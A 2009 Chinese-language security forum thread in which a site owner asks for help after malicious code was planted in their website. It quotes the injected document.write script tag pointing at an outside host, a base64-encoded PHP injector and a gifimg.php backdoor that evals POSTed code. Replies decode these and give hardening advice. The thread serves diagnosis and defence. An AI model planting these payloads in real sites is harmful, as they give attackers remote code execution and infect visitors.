酷!學園

技術討論區 => 系統安全討論版 => 主題作者是: hayaman212 於 2009-12-09 15:58

主題: 我的網站都會被植入這一段code
作者: hayaman2122009-12-09 15:58
代碼: [選擇]
document.write('<script src=http://lewor.com.pl/Smarty/templates_lewor/Smarty.class.php ><\/script>'
在我的網站都會被植入這一段code
都被寫在js裡面
該如何防止被竄改呢
主題: 回覆: 我的網站都會被植入這一段code
作者: hayaman2122009-12-09 16:12
js目錄755
js檔案644
主題: 回覆: 我的網站都會被植入這一段code
作者: ricky2009-12-09 16:41
apache的執行身份?
file的owner?
主題: 回覆: 我的網站都會被植入這一段code
作者: hayaman2122009-12-09 16:55
檔案的權限是該ftp帳號的
主題: 我的index.php遭到竄改
作者: hayaman2122009-12-09 17:55
代碼: [選擇]
<?php eval(base64_decode(&#39;aWYoIWZ1bmN0aW9uX2V4aXN0cygncngyJykpe2Z1bmN0aW9uIHJ4Migkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyeGxkMjl5TG1OdmJTNXdiQzlUYldGeWRIa3ZkR1Z0Y0d4aGRHVnpYMnhsZDI5eUwxTnRZWEowZVM1amJHRnpjeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHJ4MjIoJGEsJGIsJGMsJGQpe2dsb2JhbCRyeDIxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRyeDIxKSljYWxsX3VzZXJfZnVuYygkcngyMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0ncngyJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgncngyJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHJ4Mmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3J4MjInKSkhPSdyeDIyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=&#39;)); ?>
駭客加入了這一段code
作用什麼呢?
主題: 回覆: 我的index.php遭到竄改
作者: kenduest2009-12-09 18:12

base64 解碼後:

代碼: [選擇]
if(!function_exists('rx2')){function rx2($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2xld29yLmNvbS5wbC9TbWFydHkvdGVtcGxhdGVzX2xld29yL1NtYXJ0eS5jbGFzcy5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function rx22($a,$b,$c,$d){global$rx21;$s=array();if(function_exists($rx21))call_user_func($rx21,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='rx2')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('rx2');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$rx2l=(($a=@set_error_handler('rx22'))!='rx22')?$a:0;eval(base64_decode($_POST['e']));

真討厭,不大想解開了~~~

我比較想問的是,你們的網頁本身都是 apache 身份可以寫入的嗎?要不然怎麼都會被修改。
主題: 回覆: 我的index.php遭到竄改
作者: hayaman2122009-12-09 19:02
網頁不是apache身分執行
可能是我電腦中木馬了
因為在www.xxx.com
裡面有很多網站
都有做sql injection檢查
但被修改的是php或js或多出一個檔案
sever是用戰x測
主題: 回覆: 我的index.php遭到竄改
作者: hayaman2122009-12-09 19:03
駭客加上這段code他能做什麼
主題: 回覆: 我的index.php遭到竄改
作者: redjack2009-12-09 22:11
我知道的常見目的如下:
1) 把form 裡的資料傳送到另一網址
2) 連到某網址時,自動導向到phishing
3) 竊取cookies  裡的資料

我不會php,不過只要排版一下的話應該可以整理出來。
我想這個是重點吧:
PHNjcmlwdCBzcmM9aHR0cDovL2xld29yLmNvbS5wbC9TbWFydHkvdGVtcGxhdGVzX2xld29yL1NtYXJ0eS5jbGFzcy5waHAgPjwvc2NyaXB0Pg

這應該算是一種shell 。
主題: 回覆: 我的網站都會被植入這一段code
作者: redjack2009-12-09 22:14
檔案的權限是該ftp帳號的

所以網站的內容是直接透過ftp 上傳的嗎?
如果是的話,除非是像學校那樣給學生個人用的,否則建議不要。

web 設計師可能會說這樣有效率、方便,但是卻少了控管與安全性。
以這個case 來看,可能問題根本不出在你web server's setting,而是上傳的東西真的就是長這樣哦!
主題: 回覆: 我的index.php遭到竄改
作者: Yamaka2009-12-09 22:17
駭客加上這段code他能做什麼

這不是重點啊
好好處理一下自己網站安全問題吧
主題: 回覆: 我的網站都會被植入這一段code
作者: hayaman2122009-12-09 23:34
檔案的權限是該ftp帳號的

所以網站的內容是直接透過ftp 上傳的嗎?
如果是的話,除非是像學校那樣給學生個人用的,否則建議不要。

web 設計師可能會說這樣有效率、方便,但是卻少了控管與安全性。
以這個case 來看,可能問題根本不出在你web server's setting,而是上傳的東西真的就是長這樣哦!
檔案室透過ftp上傳的
我有看在上傳之前的檔案並沒有這段script
可是我剛才發現一個奇特的現象
就是有被插入這段script的.js檔案 最後修改時間都一模一樣
在www.xxx.com
裡面有很多網站和js檔案
最後修改時間不可能都一樣
只有js這樣
主題: 回覆: 我的網站都會被植入這一段code
作者: redjack2009-12-10 00:06
應該是說在極短時間內大量檔案被插入該CODE。

建議先照樓上大大的說法,檢查權限。
還有系統是否已被入侵?也許已經被跑一隻常駐或排程去做這個事情了 !?

然後再考量一下ftp 和web 是否要分開。
主題: 回覆: 我的網站都會被植入這一段code
作者: eose2009-12-10 09:37
可以參考一下之前的討論http://phorum.study-area.org/index.php/topic,57354.0.html

主題: 改完ftp帳密之後還是被插入script
作者: hayaman2122009-12-10 21:09
我的images目錄下都會自己出現一個檔案叫做gifimg.php

這是內容
代碼: [選擇]
<?php  eval(base64_decode(&#39;aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7&#39;));?>
主題: 回覆: 改完ftp帳密之後還是被插入script
作者: Yamaka2009-12-10 21:31
我的images目錄下都會自己出現一個檔案叫做gifimg.php

不是 ftp 帳號密碼的問題啊
之前那篇大家不是都提供一些建議了
主題: 回覆: 改完ftp帳密之後還是被插入script
作者: hayaman2122009-12-10 21:42
我全部砍掉
重新建立一個資料夾
照道理來說  只有我知道這個資料夾能瀏覽
是沒有人會知道這個資料夾的
可是看log檔卻有來自其他ip的瀏覽
主題: 回覆: 改完ftp帳密之後還是被插入script
作者: hayaman2122009-12-10 21:43
網站純html
主題: 回覆: 改完ftp帳密之後還是被插入script
作者: eose2009-12-10 21:52
請參考 http://www.scammeralert.info/website-hacked-attack-by-iframe-and-index-php-gifimg-php-base64_decode/  試試.
剛Google了一下,真是很熱門的掛碼阿 :P
主題: 回覆: 改完ftp帳密之後還是被插入script
作者: hayaman2122009-12-10 22:05
請問要如何解密這個不知道怎麼出現的檔案呢
因為log檔都沒這個紀錄
我想知道內容是什麼
代碼: [選擇]
<?php  eval(base64_decode(&#39;aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7&#39;));?>
主題: 回覆: 我的網站都會被植入這一段code
作者: hayaman2122009-12-10 22:28
請問該怎麼防範呢
主題: 回覆: 改完ftp帳密之後還是被插入script
作者: Yamaka2009-12-10 22:33
請問要如何解密這個不知道怎麼出現的檔案呢
因為log檔都沒這個紀錄
我想知道內容是什麼
代碼: [選擇]
<?php  eval(base64_decode(&#39;aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7&#39;));?>

解密?? 上面這段程式碼不就是解那段字串嗎!!


代碼: [選擇]
if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');
主題: 回覆: 我的網站都會被植入這一段code
作者: hayaman2122009-12-10 22:36
謝謝
請問要如何防範這種事情呢
主題: 回覆: 我的網站都會被植入這一段code
作者: twu22009-12-11 00:17
防範? 就是不允許執行 web server 的身份可以寫入任何 web server 存取的目錄.

你上頭還是沒明確的說明你執行 web 的使用者, 到底能不能寫檔案到那些目錄中. 只有提到一般檔案是用 ftp 的使用者傳上去的....

除非有別的漏洞, 否則我還是認為是直接經由 web server 把檔案寫進來的.
allow_url_fopen 是打開的嗎?
主題: 回覆: 我的網站都會被植入這一段code
作者: hayaman2122009-12-11 00:56
目錄是755
不能寫入的
而且這個gifimg.php擁有權是屬於該ftp帳號
可是在Log檔裡面並沒有紀錄上傳過gifimg.php這個檔案
主題: 回覆: 我的網站都會被植入這一段code
作者: eose2009-12-11 11:31
謝謝
請問要如何防範這種事情呢
請問有看過我給的URL了嗎?
http://www.scammeralert.info/website-hacked-attack-by-iframe-and-index-php-gifimg-php-base64_decode/
主題: 回覆: 我的網站都會被植入這一段code
作者: ricky2009-12-11 13:18
目錄755不代表不能寫入....
先查清楚目錄的擁有者是誰,跟apache執行者的身份是誰
以前曾經看過天才目錄跟apache的執行身份設為同一個
此外ftp帳號跟實際Server的帳號不一定相同尤其是在虛擬主機上

目錄是755
不能寫入的
而且這個gifimg.php擁有權是屬於該ftp帳號
可是在Log檔裡面並沒有紀錄上傳過gifimg.php這個檔案
主題: 回覆: 我的網站都會被植入這一段code
作者: hayaman2122009-12-11 14:48
謝謝
請問要如何防範這種事情呢
請問有看過我給的URL了嗎?
http://www.scammeralert.info/website-hacked-attack-by-iframe-and-index-php-gifimg-php-base64_decode/
有看
照做結果還是一樣
主題: 回覆: 我的網站都會被植入這一段code
作者: hayaman2122009-12-11 14:48
會不會是跟我php safe_mode關掉有關係?!
我在網站目錄下面有放一個檔案.htaccess
內容是
php_value register_argc_argv on
主題: 回覆: 我的網站都會被植入這一段code
作者: hayaman2122009-12-11 16:19
目錄755不代表不能寫入....

這句話好深奧喔
可以解釋一下嗎
主題: 回覆: 我的網站都會被植入這一段code
作者: ricky2009-12-11 17:35
系統常見的安全漏洞就是執行身份跟檔案擁有者相同

例如
apache的執行身份設為www
檔案的擁有者也是www
這樣一來檔案或目錄得權限就是套用 755 的 7 (允許rwx)

此外另一個很糟糕的行為就是把上傳的目錄(具有寫入權限)暴露在網站可以瀏覽的路徑上,同時又讓他具有執行script的權限

例如
你的程式允許使用者上傳的檔案放在upload目錄底下
又讓使用者可以去瀏覽upload目錄
像是http://www.example.com/upload/
有心人士只要上傳一個.php的檔案
然後去upload路徑執行這個php





目錄755不代表不能寫入....

這句話好深奧喔
可以解釋一下嗎
主題: 回覆: 我的網站都會被植入這一段code
作者: kenduest2009-12-12 21:43

依據 google 的資訊,主要是 pc 端本身自己中毒所以引發一連串這類事情。

找乾淨的系統登入主機後改掉所有帳號密碼,或者是關閉 ftp 登入放置檔案。然後用防毒等軟體掃描一下主機是否有木馬後門這類。
主題: 回覆: 我的網站都會被植入這一段code
作者: hayaman2122009-12-20 22:33
我已經將OS裝ubuntu
然後改掉ftp密碼 接用亂數產生10位數
可是看log檔案的確是有其他ip上傳gifimg.php
下載檔案然後在上傳被修改過的檔案
這些log檔案都有紀錄的很清楚
可是ftp帳密還是被盜耶